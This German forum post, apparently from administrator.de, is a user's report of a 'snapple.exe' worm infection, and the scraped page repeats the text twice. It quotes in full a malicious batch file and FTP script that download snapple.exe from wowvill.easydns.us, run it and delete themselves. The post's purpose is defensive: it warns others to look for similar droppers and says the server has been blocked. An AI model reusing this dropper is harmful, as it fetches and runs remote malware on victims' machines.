Trojaner "snapple.exe"
Hi, alle Viren-Wurm- und Troj.- Geplagten,
habe mir vor ein paar Tagen wegen einer kurzzeitig ausgeschalteten Firewall den "snapple.exe alias syshost.exe"-Wurm eingefangen. Zum Glück hat mein Virenscanner eine Verbreitung auf dem Rechner verhindern können. ABER interessant ist eine batch-Datei im Windows-Ordner, mit der dieses Teil immer wieder geladen werden könnte. Ich gebe sie hier mit der Kommandoerweiterung wieder:
1.bat
@echo off
ftp -n -v -s:.a
snapple.exe
del .a
del /F 1.bat
exit /y
.a
open wowvill.easydns.us 5192
user tr lo.max
binary
GET snapple.exe
bye
Damit wird snapple eingeschleust und gestartet. Da mein Virenscanner den Aufruf snapple.exe gestoppt hatte, haben die Löschbefehle nicht mehr gewirkt.
Also evtl. auch ähnliche Dateien suchen, wenn ein Schädling immer wieder kommt.
Ich habe meine Firewall jedenfalls für den o.g. Server (wowvill....) dicht gemacht.
Gute PC-Gesundheit.
Haggi
habe mir vor ein paar Tagen wegen einer kurzzeitig ausgeschalteten Firewall den "snapple.exe alias syshost.exe"-Wurm eingefangen. Zum Glück hat mein Virenscanner eine Verbreitung auf dem Rechner verhindern können. ABER interessant ist eine batch-Datei im Windows-Ordner, mit der dieses Teil immer wieder geladen werden könnte. Ich gebe sie hier mit der Kommandoerweiterung wieder:
1.bat
@echo off
ftp -n -v -s:.a
snapple.exe
del .a
del /F 1.bat
exit /y
.a
open wowvill.easydns.us 5192
user tr lo.max
binary
GET snapple.exe
bye
Damit wird snapple eingeschleust und gestartet. Da mein Virenscanner den Aufruf snapple.exe gestoppt hatte, haben die Löschbefehle nicht mehr gewirkt.
Also evtl. auch ähnliche Dateien suchen, wenn ein Schädling immer wieder kommt.
Ich habe meine Firewall jedenfalls für den o.g. Server (wowvill....) dicht gemacht.
Gute PC-Gesundheit.
Haggi
Please also mark the comments that contributed to the solution of the article
Content-Key: 10524
Url: https://administrator.de/contentid/10524
Printed on: April 24, 2024 at 07:04 o'clock
2 Comments
Latest comment